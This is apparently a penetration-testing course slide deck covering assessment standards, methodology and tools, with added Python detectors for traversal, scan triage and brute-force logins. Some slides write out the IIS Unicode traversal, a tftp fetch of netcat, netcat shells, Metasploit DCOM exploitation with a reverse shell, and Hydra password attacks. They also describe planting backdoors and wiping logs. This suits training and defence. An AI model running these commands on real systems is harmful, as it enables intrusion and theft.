NSA and PT


How To Understand Network Security Assessment and Penetration Testing

Published in: Education
  1. Program: Certified Computer Security Analyst (CCSA), LSP Telematika
     Created by Semi Yulianto
     Shared by Linuxer@kaskus.co.id
  2. Semi Yulianto
     MCT, MCP, MCSA, MCSE, MCSA & MCSE: Security, MCTS, MCITP, CCNA, CCNP, CNI, CNA, CNE, CCA, CIW-CI, CIW-SA, CEI, CEH, ECSA, CHFI, EDRP, ECSP, etc.
     Independent Trainer and Consultant, EC-Council Indonesia & Asia Pacific (Jakarta, Indonesia)
     Current Roles:
       ITS2 (Riyadh, Saudi Arabia) - Senior Technical Trainer/Security Consultant
       IshanTech (M) Sdn Bhd (Kuala Lumpur, Malaysia) - Security Consultant (Web Application Pen-Tester)
       Security Consultant (ESET Anti-Virus & Smart Security)
     Contacts: semi.yulianto@flexi-learn.com and semi.yulianto2009@gmail.com; +62 852 1325 6600 and +60 14 9377 462
  3. Agenda
     1. Vulnerabilities by Management Categories
     2. Assessment Standards
     3. Assessment Service Definition
     4. Network Assessment Methodology
     5. Pen-Test Methodology
     6. Security Tools
     7. Investigating Vulnerabilities
  4. Vulnerabilities by Management Categories
     OS configuration - Vulnerabilities due to improperly configured operating system software.
     Software maintenance - Vulnerabilities due to failure to apply patches to known vulnerabilities.
     Password/access control - Failure to comply with password policy and improper access control settings.
     Malicious software - Existence of malicious software (Trojans, worms, etc.) or evidence of use.
     Dangerous services - Existence of vulnerable or easily exploited services or processes.
     Application configuration - Vulnerabilities due to improperly configured applications.
  5. NSA (US) INFOSEC Assessment Methodology (IAM): The United States National Security Agency (NSA) has provided an INFOSEC Assessment Methodology (IAM) framework to help consultants and security professionals outside the NSA provide assessment services to clients in line with a recognized standard. http://www.iatrp.com
     CESG CHECK (UK): The Government Communications Headquarters (GCHQ) in the United Kingdom has an information assurance arm known as the Communications and Electronics Security Group (CESG). In the same way that the NSA IAM framework allows security consultants outside the NSA to provide assessment services, CESG operates a program known as CHECK to evaluate and accredit security testing teams within the U.K. to undertake government assessment work. http://www.cesg.gov.uk/site/check/index.cfm
  6. The IAM framework defines three levels of assessment:
     Assessment - Level 1 involves discovering a cooperative high-level overview of the organization being assessed, including access to policies, procedures, and information flow. No hands-on network or system testing is undertaken at this level.
     Evaluation - Level 2 is a hands-on cooperative process that involves testing with network scanning, penetration tools, and the use of specific technical expertise.
     Red Team - Level 3 is non-cooperative and external to the target network, involving penetration testing to simulate the appropriate adversary.
     IAM assessment is non-intrusive, so within this framework, a Level 3 assessment involves full qualification of vulnerabilities.
  7. The CESG CHECK network security assessment competencies are:
     1. Use of DNS information retrieval tools for both single and multiple records, including an understanding of DNS record structure relating to target hosts.
     2. Use of ICMP, TCP, and UDP network mapping and probing tools.
     3. Demonstration of TCP service banner grabbing.
     4. Information retrieval using SNMP, including an understanding of MIB structure relating to target system configuration and network routes.
     5. Understanding of common weaknesses in routers and switches relating to Telnet, HTTP, SNMP, and TFTP access and configuration.
  8. CESG CHECK Unix-specific competencies:
     1. User enumeration via finger, rusers, rwho, and SMTP techniques.
     2. Use of tools to enumerate Remote Procedure Call (RPC) services and demonstrate an understanding of the security implications associated with those services.
     3. Demonstration of testing for Network File System (NFS) weaknesses.
     4. Testing for weaknesses within r-services (rsh, rexec, and rlogin).
     5. Detection of insecure X Windows servers.
     6. Testing for weaknesses within web, FTP, and Samba services.
  9. CESG CHECK Windows NT-specific competencies:
     1. Assessment of NetBIOS and CIFS services to enumerate users, groups, shares, domains, domain controllers, password policies, and associated weaknesses.
     2. Username and password grinding via NetBIOS and CIFS services.
     3. Detecting and demonstrating presence of known security weaknesses within Internet Information Server (IIS) web and FTP service components, and Microsoft SQL Server.
  10. Other Assessment Standards & Associations:
      ISECOM's Open Source Security Testing Methodology Manual (OSSTMM) http://www.osstmm.org
      Council of Registered Ethical Security Testers (CREST) http://www.crestapproved.com
      TIGER Scheme http://www.tigerscheme.org
      EC-Council's Certified Ethical Hacker (CEH) http://www.eccouncil.org/CEH.htm
      Open Source Web Application Security Project (OWASP) http://www.owasp.org
  11. Assessment Service Definition
      1. Vulnerability Scanning
      2. Network Security Assessment
      3. Web Application Testing
      4. Penetration Testing
      5. Onsite Audit
  12. Vulnerability Scanning: Uses automated systems (such as Nessus, ISS Internet Scanner, QualysGuard, or eEye Retina) with minimal hands-on qualification and assessment of vulnerabilities. This is an inexpensive way to ensure that no obvious vulnerabilities exist, but it doesn't provide a clear strategy to improve security.
      Network Security Assessment: An effective blend of automated and hands-on manual vulnerability testing and qualification. The report is usually handwritten, accurate, and concise, giving practical advice that can improve a company's security.
  13. Web Application Testing: Involves post-authentication assessment of web application components, identifying command injection, poor permissions, and other weaknesses within a given web application. Testing at this level involves extensive manual qualification and consultant involvement, and it cannot be easily automated.
      Penetration Testing: Involves multiple attack vectors (e.g., telephone war dialing, social engineering, and wireless testing) to compromise the target environment. It demonstrates and discusses the methodologies adopted by determined Internet-based attackers to compromise IP networks remotely, which in turn will allow you to improve IP network security.
  14. Onsite Audit: Provides the clearest picture of network security. Consultants have local system access and run tools on each system capable of identifying anything untoward, including rootkits, weak user passwords, poor permissions, and other issues. 802.11 wireless testing is often performed as part of onsite auditing.
  15. High-level components of Network Assessment:
      1. Network reconnaissance to identify IP networks and hosts of interest.
      2. Bulk network scanning and probing to identify potentially vulnerable hosts.
      3. Investigation of vulnerabilities and further network probing by hand.
      4. Exploitation of vulnerabilities and circumvention of security mechanisms.
  16. Pen-Test Methodology
      1. Information Gathering
      2. Service Enumeration
      3. Vulnerability Identification
      4. Penetration
      5. Maintaining Access
      6. Housekeeping
  17. Information Gathering: The objective of information gathering is to find as much information as possible about the target of evaluation by using passive (Google, Whois, WWW) or active (social engineering) information gathering.
      Service Enumeration: Involves launching network and port scanning to find open and filtered ports and the services running on a specific port.
  18. Vulnerability Identification: Involves finding new and currently available vulnerabilities on the operating systems, applications and/or services (manual or automated).
      Penetration: Involves active penetration of a specific target of evaluation by exploiting any new or known vulnerability.
  19. Maintaining Access: Involves uploading a trojan or backdoor with the objective of making it easier to go in and out of a target of evaluation without having to repeat the exploitation, and ensuring that the activities are not noticed.
      Housekeeping: Cleaning up to cover tracks. Involves disabling audit settings and clearing or altering log files (system, security and application).
  20. Scanning Tools:
      1. Nmap (http://www.insecure.org)
      2. Nessus (http://www.nessus.org)
      3. ISS Internet Scanner (http://www.iss.net)
      4. eEye Retina (http://www.eeye.com)
      5. QualysGuard (http://www.qualys.com)
      6. Matta Colossus (http://www.trustmatta.com)
  21. Exploitation Frameworks:
      1. Metasploit Framework (http://www.metasploit.com)
      2. Core IMPACT (http://www.coresecurity.com)
      3. Immunity CANVAS (http://www.immunityinc.com/products-canvas.shtml)
  22. Proxy-based web application testing tools:
      1. Paros (http://www.parosproxy.org)
      2. WebScarab (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
      3. Burp Suite (http://portswigger.net)
  23. Active web application crawling and fuzzing tools:
      1. Wapiti (http://wapiti.sourceforge.net)
      2. Nikto (http://www.cirt.net/code/nikto.shtml)
  24. Web Application Scanning Tools:
      1. Acunetix Web Vulnerability Scanner (http://www.acunetix.com)
      2. Watchfire AppScan (http://www.watchfire.com/products/appscan/)
      3. SPI Dynamics WebInspect (http://www.spidynamics.com/products/webinspect/)
      4. Cenzic Hailstorm (http://www.cenzic.com/products_services/cenzic_hailstorm.php)
  25. Useful Websites:
      1. Securiteam (http://www.securiteam.com)
      2. SecurityFocus (http://www.securityfocus.com)
      3. milw0rm (http://www.milw0rm.com)
      4. Offensive Security Exploit DB (http://www.exploit-db.com)
      5. Packet Storm (http://www.packetstormsecurity.org)
      6. FrSIRT (http://www.frsirt.com)
      7. MITRE Corporation CVE (http://cve.mitre.org)
      8. NIST National Vulnerability Database (http://nvd.nist.gov)
      9. ISS X-Force (http://xforce.iss.net)
      10. CERT vulnerability notes (http://www.kb.cert.org/vuls)
      11. eEye Preview (http://research.eeye.com/html/services)
      12. 3Com TippingPoint DVLabs (http://dvlabs.tippingpoint.com)
      13. VeriSign iDefense Security Intelligence Services (http://labs.idefense.com/services)
  26. Course modules:
      1. Information Gathering
      2. Service Identification
      3. Vulnerability Identification
      4. Penetration (Exploitation)
      5. Maintaining Access
      6. Housekeeping (Covering Tracks)
      7. Password Cracking
      8. Client-Side Hacking
      9. Web Application Hacking
      10. Denial-of-Service (DoS) Attacks
      11. Sniffing and ARP Spoofing
      12. Wireless Hacking
      13. Linux Hacking
      14. Analyzing Attack Signatures with IDS and Sniffer
      15. Evading IDS and Firewall
  27. IIS Unicode Directory Traversal Exploit
      Syntax:
        nc -v <target_ip> <http_port>
        GET http://<target_ip>/scripts/<unicode_strings>/<windows_dir>/cmd.exe?/c+<command>
      Example:
        nc -v 80
        GET nt/system32/cmd.exe?/c+dir
  28. TFTP (Trivial File Transfer Protocol) Upload and Download
      Syntax:
        tftp -i <localhost_ip> GET <file>
        tftp -i <localhost_ip> PUT <file>
      Example:
        tftp -i GET nc.exe
        tftp -i PUT nc.exe
      Unicode Example:
        GET m32/cmd.exe?/c+tftp+-i+
  29. Netcat (Network Swiss Army Knife) - Server Mode (listening/reverse TCP)
      Syntax:
        nc -v -l -p <port_to_listen_to>
        nc -vlp <port_to_listen_to>
      Example:
        nc -v -l -p 555
        nc -vlp 555
  30. Netcat (Network Swiss Army Knife) - Client Mode (connecting/bind TCP)
      Syntax:
        nc -v <target_ip> <target_port>
      Example:
        nc -v 555
  31. Netcat (Network Swiss Army Knife) - Server Mode (listening/reverse TCP)
      Syntax:
        nc -v -l -p <listening_port>
      Unicode Syntax:
        GET http://<target_ip>/scripts/<unicode_strings>/<windows_dir>/cmd.exe?/c+<command>
      Example:
        GET m32/cmd.exe?/c+nc+-v+-l+-p+5555
  32. Netcat (Network Swiss Army Knife) - Client Mode (connecting/bind TCP)
      Syntax:
        nc -v <target_ip> <target_port>
      Unicode Syntax:
        GET http://<target_ip>/scripts/<unicode_strings>/<windows_dir>/cmd.exe?/c+<command>
      Example:
        GET m32/cmd.exe?/c+nc+-v+
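Every request shown on slides 27, 28, 31 and 32 passes through the web server's log, which is where module 14 ("Analyzing Attack Signatures with IDS and Sniffer") would look for it. The detector below is an added example, not code from the original slides: it percent-decodes each request path twice (so `%255c`-style double encoding is caught), maps the overlong two-byte UTF-8 forms that the vulnerable IIS versions accepted for `/` and `\` (`%c0%af`, `%c1%9c`) although a standards-compliant decoder rejects them, and then flags any request that climbs above the web root or names a command interpreter. The log lines are constructed in a W3C-style layout with documentation IP addresses; the field order and the list of suspicious targets are my own assumptions.

```python
import re
from urllib.parse import unquote_to_bytes, unquote_plus

# Constructed sample log (not from the slides). Fields, space separated:
# date time client-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2010-03-01 10:00:01 198.51.100.7 GET /index.html - 200
2010-03-01 10:00:05 203.0.113.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 200
2010-03-01 10:00:09 203.0.113.9 GET /scripts/..%255c../winnt/system32/cmd.exe /c+tftp+-i+203.0.113.9+GET+nc.exe 200
2010-03-01 10:00:12 198.51.100.7 GET /images/logo.gif - 200
2010-03-01 10:00:20 203.0.113.9 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+nc+-v+-l+-p+5555 200
"""

LOG_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")
# Assumed list of interpreter names worth flagging when they appear as the requested file.
SUSPICIOUS_TARGETS = re.compile(r"(cmd\.exe|command\.com)$", re.IGNORECASE)


def _decode_overlong(raw: bytes) -> str:
    """UTF-8 decode that also accepts 2-byte overlong forms (lead byte 0xC0/0xC1).

    A correct decoder rejects them; the affected IIS releases decoded them,
    so %c0%af became '/' and %c1%9c became '\\'. We fold them the same way so
    the path we inspect is the path the server actually acted on.
    """
    fixed = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            fixed.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            fixed.append(b)
            i += 1
    return bytes(fixed).decode("utf-8", errors="replace")


def normalize_path(uri: str, passes: int = 2) -> str:
    """Percent-decode up to `passes` times, fold overlong sequences, unify separators."""
    s = uri
    for _ in range(passes):
        decoded = _decode_overlong(unquote_to_bytes(s))
        if decoded == s:
            break
        s = decoded
    return s.replace("\\", "/")


def escapes_webroot(path: str) -> bool:
    """True if '..' segments ever take the path above the web root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def analyze_line(line: str):
    """Return a finding dict for one log line, or None if it parses but looks benign."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    when, client, method, stem, query, status = m.groups()
    path = normalize_path(stem)
    reasons = []
    if escapes_webroot(path):
        reasons.append("path traversal outside webroot")
    if SUSPICIOUS_TARGETS.search(path):
        reasons.append("command interpreter requested")
    if not reasons:
        return None
    return {
        "time": when, "client": client, "method": method, "status": status,
        "path": path,
        "command": unquote_plus(query) if query != "-" else "",
        "reasons": reasons,
    }


def scan_log(text: str):
    """All findings in a log, in file order."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["time"], f["client"], f["path"], repr(f["command"]), "; ".join(f["reasons"]))
```

The two checks are deliberately independent: the traversal test fires even when the attacker asks for something other than `cmd.exe`, and the interpreter test fires even when `cmd.exe` is reached without leaving the web root, so a single rule that only matches the literal string `%c0%af` would miss both cases.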
  33. Nmap (Ping Sweep/Network Scan)
      Syntax:
        nmap -sP <network_id>
      Example:
        nmap -sP
      Nmap (Port Scan)
      Syntax:
        nmap <target_ip>
      Example:
        nmap
  34. Nmap (Port Scan with Options)
      Syntax:
        nmap <option> <target_ip>
      Examples:
        nmap -sS -sV -O
        nmap -sS -sV -p80,443 -O
        nmap -sS -sV -p80,443 -O -T4
        nmap -sS -sV -p80,443 -O -T4 -PN
        nmap -sU -sV -O
        nmap -A
  35. Nmap (Enumeration)
      Syntax:
        nmap <option> <script> <target_ip>
      Examples:
        nmap -sS --script=smb-enum-users
        nmap -sS --script=smb-enum-shares
        nmap -sS --script=smb-enum-domains
        nmap -sS --script=smb-enum-processes
        nmap -sS --script=smb-enum-security
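Slides 33 to 35 produce raw scan output; step 3 of the network assessment methodology on slide 15 then calls for investigating it by hand, and slide 4 names "dangerous services" as one of the management categories a finding is filed under. As an added example (my code, not from the slides), the script below reads Nmap's XML output (the `-oX` format) and turns it into a per-host inventory, then triages it two ways: open services on a list of cleartext or historically weak protocols drawn from the CESG CHECK competency slides, and services whose name Nmap took from its port-number table (`method="table"`) rather than from a `-sV` version probe (`method="probed"`), which are the ones that still need hand qualification. The XML is a constructed sample with documentation addresses, and the weak-service list is my own selection.

```python
import xml.etree.ElementTree as ET

# Constructed sample of Nmap XML output (-oX), trimmed to the elements used below.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sV -O -oX - 192.0.2.0/29" version="5.00">
  <host><status state="up" reason="echo-reply"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open" reason="syn-ack"/><service name="ftp" product="vsftpd" version="2.0.8" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="23"><state state="open" reason="syn-ack"/><service name="telnet" method="table" conf="3"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="Microsoft IIS httpd" version="5.0" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="443"><state state="filtered" reason="no-response"/><service name="https" method="table" conf="3"/></port>
    </ports>
  </host>
  <host><status state="up" reason="echo-reply"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH" version="5.3" method="probed" conf="10"/></port>
      <port protocol="udp" portid="161"><state state="open|filtered" reason="no-response"/><service name="snmp" method="table" conf="3"/></port>
    </ports>
  </host>
  <host><status state="down" reason="no-response"/>
    <address addr="192.0.2.12" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# Assumed triage list: cleartext or legacy services the CESG CHECK slides call out
# (Telnet, TFTP, SNMP, finger, r-services, NFS, NetBIOS/CIFS, X11, RPC), using Nmap's service names.
WEAK_SERVICES = {"telnet", "ftp", "tftp", "finger", "shell", "login", "exec", "nfs",
                 "snmp", "netbios-ssn", "microsoft-ds", "x11", "sunrpc"}


def parse_nmap_xml(xml_text: str):
    """One record per live host: address plus a list of port/service entries."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # hosts Nmap considered down carry no ports
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        services = []
        for port in host.iter("port"):
            svc = port.find("service")
            product = ""
            if svc is not None:
                product = " ".join(p for p in (svc.get("product"), svc.get("version")) if p)
            services.append({
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "state": port.find("state").get("state"),
                "name": svc.get("name") if svc is not None else None,
                "product": product,
                # "probed": -sV matched a version probe; "table": guessed from the port number
                "verified": svc is not None and svc.get("method") == "probed",
            })
        hosts.append({"addr": addr, "services": services})
    return hosts


def triage(hosts):
    """Findings for open (or open|filtered) ports: weak protocols, and unverified identities."""
    findings = []
    for h in hosts:
        for s in h["services"]:
            if not s["state"].startswith("open"):
                continue
            base = {"addr": h["addr"], "port": s["port"], "proto": s["proto"], "service": s["name"]}
            if s["name"] in WEAK_SERVICES:
                findings.append(dict(base, reason="cleartext/legacy service"))
            if not s["verified"]:
                findings.append(dict(base, reason="identity from port table only, qualify by hand"))
    return findings


if __name__ == "__main__":
    inventory = parse_nmap_xml(SAMPLE_NMAP_XML)
    for h in inventory:
        for s in h["services"]:
            print(h["addr"], f'{s["port"]}/{s["proto"]}', s["state"], s["name"], s["product"])
    for f in triage(inventory):
        print("FINDING", f["addr"], f["port"], f["service"], "-", f["reason"])
```

Note that UDP ports reported as `open|filtered` are kept: Nmap cannot tell an open UDP service from a silently dropped probe, so SNMP on 161/udp still has to be qualified by hand (for example with the SNMP MIB walk named in the CESG competencies) before it is reported either way.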
  36. Metasploit Framework Exploit Module (MSFConsole)
        cd /pentest/exploits/msf3
        ./msfconsole
      Syntax:
        msf > help
        msf > show exploits
        msf > use <exploit_module>
        msf > show payloads
        msf > set PAYLOAD <payload_type>
        msf > show options
        msf > set RHOST <target_ip>
        msf > set LHOST <localhost_ip>
        msf > set LPORT <local_port>
        msf > set RPORT <remote_port>
        msf > show targets
        msf > set TARGET <target_id>
        msf > exploit
  37. Metasploit Framework Exploit Module (MSFConsole)
        cd /pentest/exploits/msf3
        ./msfconsole
      Example:
        msf > help
        msf > show exploits
        msf > use windows/dcerpc/ms03_026_dcom
        msf > show payloads
        msf > set PAYLOAD windows/shell/reverse_tcp
        msf > show options
        msf > set RHOST
        msf > set LHOST
        msf > set LPORT 5555
        msf > set RPORT 1234
        msf > show targets
        msf > set TARGET 0
        msf > exploit
  38. Metasploit Framework Auxiliary Module
        cd /pentest/exploits/msf3
        ./msfconsole
      Syntax:
        msf > help
        msf > show auxiliary
        msf > use <auxiliary_module>
        msf > set RHOSTS <target_ip_or_network_id>
        msf > run
  39. Metasploit Framework Auxiliary Module
        cd /pentest/exploits/msf3
        ./msfconsole
      Example 1:
        msf > help
        msf > show auxiliary
        msf > use scanner/smb/smb_version
        msf > set RHOSTS
        msf > run
      Example 2:
        msf > help
        msf > show auxiliary
        msf > use scanner/smb/smb_version
        msf > set RHOSTS
        msf > run
  40. Metasploit Framework Exploit Module (MSFCLI)
        cd /pentest/exploits/msf3
      Syntax:
        ./msfcli <exploit_module> <payload_type> <options> E
      Example:
        ./msfcli windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST= E
  41. THC Hydra (Dictionary-based Password Cracking)
        cd /tmp
      Syntax:
        ./hydra -L <users_file> -P <passwords_file> <target_ip> <service_type>
      Examples:
        ./hydra -L login.txt -P pass.txt ftp
        ./hydra -L login.txt -P pass.txt smb
        ./hydra -L login.txt -P pass.txt mssql
        ./hydra -L login.txt -P pass.txt rpc
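A dictionary run like the ones on slide 41 leaves the same signature on the target whichever service it hits: a burst of failed logins from one client, spread over many usernames (the `-L` list) or many passwords for one account (the `-P` list), and, if it works, a success from that client shortly afterwards. The detector below is an added example, not from the slides; it walks an authentication log with a sliding window per client and raises two alert kinds: a failure burst, and a successful login from a client that has a burst still inside the window. The log lines are constructed in a vsftpd-style layout with documentation addresses; the threshold and window are assumptions to tune per service.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample log (not from the slides), vsftpd-style lines.
# 203.0.113.9 fails six logins across four usernames in three seconds, then succeeds.
SAMPLE_LOG = """\
Mon Mar  1 10:00:01 2010 [pid 4011] [alice] OK LOGIN: Client "198.51.100.7"
Mon Mar  1 10:00:02 2010 [pid 4012] [admin] FAIL LOGIN: Client "203.0.113.9"
Mon Mar  1 10:00:02 2010 [pid 4013] [admin] FAIL LOGIN: Client "203.0.113.9"
Mon Mar  1 10:00:03 2010 [pid 4014] [root] FAIL LOGIN: Client "203.0.113.9"
Mon Mar  1 10:00:03 2010 [pid 4015] [test] FAIL LOGIN: Client "203.0.113.9"
Mon Mar  1 10:00:04 2010 [pid 4016] [ftp] FAIL LOGIN: Client "203.0.113.9"
Mon Mar  1 10:00:04 2010 [pid 4017] [admin] FAIL LOGIN: Client "203.0.113.9"
Mon Mar  1 10:00:05 2010 [pid 4018] [admin] OK LOGIN: Client "203.0.113.9"
Mon Mar  1 10:00:30 2010 [pid 4019] [bob] FAIL LOGIN: Client "198.51.100.7"
Mon Mar  1 10:00:35 2010 [pid 4020] [bob] OK LOGIN: Client "198.51.100.7"
Mon Mar  1 10:05:00 2010 [pid 4021] [admin] FAIL LOGIN: Client "203.0.113.9"
"""

LINE_RE = re.compile(
    r'^(\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[([^\]]*)\] '
    r'(OK|FAIL) LOGIN: Client "([^"]+)"$'
)


def parse_line(line: str):
    """(timestamp, user, result, client) for one log line, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, user, result, client = m.groups()
    when = datetime.strptime(" ".join(ts.split()), "%a %b %d %H:%M:%S %Y")
    return when, user, result, client


def detect_bruteforce(log_text: str, threshold: int = 5, window_seconds: int = 60):
    """Sliding-window detector.

    Keeps, per client, the failures seen in the last `window_seconds`. Raises a
    'failure_burst' alert once per client when the count reaches `threshold`, and a
    'success_after_failures' alert when a login from that client succeeds while the
    burst is still inside the window (the pattern of a dictionary attack that worked).
    """
    recent = defaultdict(deque)  # client -> deque of (time, username) failures
    burst_alerted = set()
    alerts = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        when, user, result, client = parsed
        q = recent[client]
        while q and (when - q[0][0]).total_seconds() > window_seconds:
            q.popleft()  # drop failures that have aged out of the window
        if result == "FAIL":
            q.append((when, user))
            if len(q) >= threshold and client not in burst_alerted:
                burst_alerted.add(client)
                alerts.append({
                    "kind": "failure_burst", "client": client,
                    "failures": len(q), "distinct_users": len({u for _, u in q}),
                    "first": q[0][0], "last": when,
                })
        elif len(q) >= threshold:
            alerts.append({
                "kind": "success_after_failures", "client": client,
                "user": user, "prior_failures": len(q), "at": when,
            })
            q.clear()  # the burst has been reported; start counting afresh
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG):
        print(a)
```

The `distinct_users` count separates the two hydra shapes on the slide: a high count with few failures per name points at a username list being walked, a count of one at a password list being run against a single account. Either way the second alert kind is the one to page on, since it means the guessing stopped because it succeeded.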
  42. Nikto (Web Application Vulnerability Scanner)
        cd /pentest/nikto
      Syntax:
        ./nikto.pl -host <target_ip>
      Example:
        ./nikto.pl -host